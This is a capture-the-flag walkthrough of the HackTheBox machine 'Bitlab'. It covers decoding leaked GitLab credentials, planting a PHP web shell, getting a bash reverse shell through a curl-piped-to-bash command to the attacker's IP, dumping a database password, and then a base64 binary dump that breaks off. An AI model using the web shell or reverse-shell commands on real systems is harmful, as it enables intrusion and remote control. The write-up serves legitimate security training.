# Bitlab

This is a medium difficulty Linux machine from [HackTheBox](https://app.hackthebox.com/machines/Bitlab) created by Frey and thek. In this scenario, my IP is 10.10.14.103 and the target’s IP is 10.129.11.47

### Gathering Information

This step is always the same, you must ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises.

{% code title="Local Terminal" %}

```bash
ping -c 1 10.129.11.47

Pinging 10.129.11.47 with 32 bytes of data:
Reply from 10.129.11.47: bytes=32 time=227ms TTL=63
Reply from 10.129.11.47: bytes=32 time=190ms TTL=63
Reply from 10.129.11.47: bytes=32 time=209ms TTL=63
Reply from 10.129.11.47: bytes=32 time=199ms TTL=63

Ping statistics for 10.129.11.47:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 190ms, Maximum = 227ms, Average = 206ms
```

{% endcode %}

The target respond and by the TTL we can asume that is a Linux machine (Around 63).

{% code title="Local Terminal" %}

```bash
nmap -p- --open -T5 -v -n 10.129.11.47 -oN Ports

Nmap scan report for 10.129.11.47
Host is up (0.18s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
nmap -sCV -p 22,80 10.129.11.47 -oN WebScan

Nmap scan report for 10.129.11.47
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
|   256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_  256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open  http    nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.129.11.47/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```

{% endcode %}

Looks like http-robot.txt is open, if there is nothing relevant at the website, we can check some urls by /http-robot.txt.

{% code title="Local Terminal" %}

```bash
whatweb http://10.129.11.47

http://10.129.11.47 [302 Found] Country[RESERVED][ZZ], HTTPServer[nginx], IP[10.129.11.47], RedirectLocation[http://10.129.11.47/users/sign_in], UncommonHeaders[x-content-type-options,x-request-id,x-accel-buffering], X-Frame-Options[DENY], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx
http://10.129.11.47/users/sign_in [200 OK] Cookies[_gitlab_session], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx], HttpOnly[_gitlab_session], IP[10.129.11.47], Open-Graph-Protocol, PasswordField[user[password]], Script, Title[Sign in · GitLab], UncommonHeaders[x-content-type-options,x-request-id,x-accel-buffering], X-Frame-Options[DENY], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx
```

{% endcode %}

* Browser:   <http://10.129.11.47/>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F8EtINLqxLf0j2ZQl37Sb%2Fimage.png?alt=media&#x26;token=cf803c4a-7b6b-4562-8eeb-32860757dda5" alt=""><figcaption><p>There is no registration panel</p></figcaption></figure>

To explore the website, try to login with simple credentials, like admin\@admin, or admin\@admin1234, etc (Nothing Happens). And then try to recover your password.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FZWxJ1tfBO6Yl6i6yadES%2Fimage.png?alt=media&#x26;token=9690d6ee-cfad-4c16-93f9-fa13ba25dc7e" alt=""><figcaption><p>With this kind of answer, we can't enumerate.</p></figcaption></figure>

Now we return to our finding.

* Browser:   <http://10.129.11.47/robots.txt>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FtGBdrvSunUb7DD9QSfzl%2Fimage.png?alt=media&#x26;token=ef5394e7-ec41-4a1c-8077-075ae166a850" alt=""><figcaption></figcaption></figure>

Looks like we need to be logged in to get more information from these paths. But after exploring many of them, /help have interesting information.

* Browser:   <http://10.129.11.47/help>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FTH7k1vJAQuypHP8DY72u%2Fimage.png?alt=media&#x26;token=34b557f3-9d6c-41c1-9f55-aa34cad29f6d" alt=""><figcaption><p>Click in <strong>bookmarks.html</strong></p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FSeAPTtSf9zQM2JVR3Ur6%2Fimage.png?alt=media&#x26;token=ba0b5211-32a2-401c-9c29-0cdb2a5174d6" alt=""><figcaption></figcaption></figure>

As you can see, in view:source at bookmarks.html, there is a Java Script command written in hexadecimal, copy it and use echo to translate.

{% code title="Local Terminal" %}

```bash
printf "var _0x4b18=[&quot;\x76\x61\x6C\x75\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x63\x6C\x61\x76\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64&quot;,&quot;\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78&quot;];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];"
```

{% endcode %}

The output it is still dirty, we need to replace every \&quot by using **| sed "s/\&quot/'/g"** at the end of the previous command.

{% code title="Local Terminal" %}

```bash
printf "var _0x4b18=[&quot;\x76\x61\x6C\x75\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x63\x6C\x61\x76\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64&quot;,&quot;\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78&quot;];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];" | sed "s/&quot/'/g"
```

{% endcode %}

```
var _0x4b18=[';value';,';user_login';,';getElementById';,';clave';,';user_password';,';11des0081x';];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];
```

And here, we can find some important information, like {user\_login : clave} and {user\_password : 11des0081x}, let's try at user login.

* Browser:   <http://10.129.11.47/users/sign\\_in>
  * Login with clave\@11des0081x

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FY4TifSCdSXT1Lwnz5AwN%2Fimage.png?alt=media&#x26;token=8d3d8a48-13ce-4160-98ba-2d5e26f92d60" alt=""><figcaption><p>We are in, it's time to explore the whole site.</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FkrpaDtXodPCxe1EqXkyQ%2Fimage.png?alt=media&#x26;token=c7214b5e-4ef8-4028-9194-3b240bcd2ba8" alt=""><figcaption><p>At Snippets there is something interesting.</p></figcaption></figure>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FcrundVACcNGV64mZ77BZ%2Fimage.png?alt=media&#x26;token=0a99d794-ffa6-4d83-b3ff-d216a97e6c50" alt=""><figcaption></figcaption></figure>

We can save this information for the future, a good practice is to copy this file and save it in your local device. After doing this, return to Projects > Your Projects > Administrator/Profile.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FbfHOenbJAKC4WKa9dGKB%2Fimage.png?alt=media&#x26;token=521d2a0e-259d-4658-8a99-0306cd3c98e6" alt=""><figcaption></figcaption></figure>

Here, we have to find where is project is launched, is a profile page, so it must be at <http://10.129.11.47/profile/>, and if you go to <http://10.129.11.47/profile/developer.jpg>, you can see that is directly connected, for us this is an advantage, because we are connected as developer "clave" and we can upload or create files here.

Create a new file called reverseShell.php and add the below code, after that, commit and merge the new file.

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2Fv9DBp3S44WP3CZqx6hAj%2Fimage.png?alt=media&#x26;token=59e8cec5-4a00-4a45-a9be-bc5acc65d1bb" alt=""><figcaption></figcaption></figure>

{% code title="reverseShell.php" %}

```php
<?php
    echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FLRWrYYmiqOlh9SFPst01%2Fimage.png?alt=media&#x26;token=2f4dbc1e-9c15-4504-babf-b74b2e62c8f3" alt=""><figcaption><p>Remember to merge the edition.</p></figcaption></figure>

* Browser:   <http://10.129.11.47/profile/reverseShell.php>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FgYbTmmvAZABSAN4iisY9%2Fimage.png?alt=media&#x26;token=69a5777d-7eb5-458d-90ca-49075a080a2c" alt=""><figcaption><p>Ok, it is working, now we have to add a command to test it</p></figcaption></figure>

* Browser:   <http://10.129.11.47/profile/reverseShell.php?cmd=whoami>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FVoHA2z0iG6fGshkwNmLc%2Fimage.png?alt=media&#x26;token=18a2d78d-153a-4ff5-afb7-35aafc61b2eb" alt=""><figcaption></figcaption></figure>

All right, now that we can execute commands as the target, we are going to follow steps to gain access to the Bash command prompt.

First, create a file called index.html.

{% code title="Local Terminal" %}

```bash
vi index.html
```

{% endcode %}

```bash
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.103/443 0>&1
```

Then open two local terminals, one to open an http server and the other one listening using the port 443

{% code title="Local Terminal I" %}

```bash
python3 -m http.server 80
```

{% endcode %}

If you want to validate if you can use curl from the target, try at the browser "<http://10.129.11.47/profile/reverseShell.php?cmd=which> curl"

{% code title="Local Terminal" %}

```bash
nc -nlvp 443
```

{% endcode %}

* Browser:   <http://10.129.11.47/profile/reverseShell.php?cmd=curl> 10.10.14.103 | bash

Now we are logged at the target machine as www-data.

{% code title="Target Terminal \[www-data]" %}

```bash
Connection received on 10.129.11.47 60386
bash: cannot set terminal process group (1415): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bitlab:/var/www/html/profile$ whoami
whoami
www-data
```

{% endcode %}

Now that we are in, do an [TTY Treatment](https://robertos-notebook.gitbook.io/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade).

Here, we need to be the user "clave" to see the content of the first flag. Previously, we found a postgresql file in the machine. First you must test with **which psql** if the system has the application, if not, you can simulate something similar with php, and it's already tested that the target have PHP.

{% code title="Target Terminal \[www-data]" %}

```bash
which psql # Nothing happens
php --interactive
```

{% endcode %}

If we follow the process by using the example from PHP: PDO, we can login to PSQL.

{% code title="php example" %}

```php
<?php
/* Connect to a MySQL database using driver invocation */
$dsn = 'mysql:dbname=testdb;host=127.0.0.1';
$user = 'dbuser';
$password = 'dbpass';

$dbh = new PDO($dsn, $user, $password);

?>
```

{% endcode %}

{% embed url="<https://www.php.net/manual/en/pdo.construct.php>" %}

<pre class="language-bash" data-title="php --interactive"><code class="lang-bash"><strong>$connection = new PDO('pgsql:dbname=profiles;host=localhost', 'profiles', 'profiles');
</strong>$connect = $connection->query("select * from profiles");
$result = $connect->fetchAll();
print_r($result);
</code></pre>

```
Array
(
    [0] => Array
        (
            [id] => 1
            [0] => 1
            [username] => clave
            [1] => clave
            [password] => c3NoLXN0cjBuZy1wQHNz==
            [2] => c3NoLXN0cjBuZy1wQHNz==
        )

)
```

And we found a password, open a new terminal and translate the password with: **echo "c3NoLXN0cjBuZy1wQHNz" | base64 -d; echo**. The output is {ssh-str0ng-p\@ss}, with this in hand, open a new terminal, translate, and then login thorough ssh.

{% code title="Local Terminal" %}

```bash
echo "c3NoLXN0cjBuZy1wQHNz" | base64 -d; echo
ssh-str0ng-p@ss

ssh clave@10.129.11.47 # ssh-str0ng-p@ss
# It fails? Maybe is now necessary to decrypt the password...

ssh clave@10.129.11.47 # c3NoLXN0cjBuZy1wQHNz==
# It works
```

{% endcode %}

{% code title="Target Terminal \[clave]" %}

```bash
clave@bitlab:~$ whoami
clave

clave@bitlab:~$ cat /home/clave/user.txt
3508d1a1a8f6660db185698b142a0ac0
```

{% endcode %}

### Privileges Escalation

So first we want to gather information from the current account.

{% code title="Target Terminal \[clave]" %}

```bash
clave@bitlab:~$ id
uid=1000(clave) gid=1000(clave) groups=1000(clave)

clave@bitlab:~$ sudo -l  # Both password fails...
Sorry, try again.
[sudo] password for clave:
Sorry, try again.
[sudo] password for clave:
sudo: 2 incorrect password attempts

clave@bitlab:~$ uname -a
Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

clave@bitlab:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.2 LTS
Release:        18.04
Codename:       bionic

clave@bitlab:~$ ls -l
total 20
-r-------- 1 clave clave 13824 Jul 30  2019 RemoteConnection.exe
-r-------- 1 clave clave    33 May 19 13:53 user.txt
clave@bitlab:~$
```

{% endcode %}

And the only interesting thing here is only the file "RemoteConnection.exe", we will download that file and then try to figure out what's going on.

From the target, encrypt the whole file in base64, copy the content and create a file at your local terminal, with the same name.

{% code title="Target Terminal \[clave]" %}

```bash
python3 -m http.server 8080
```

{% endcode %}

```
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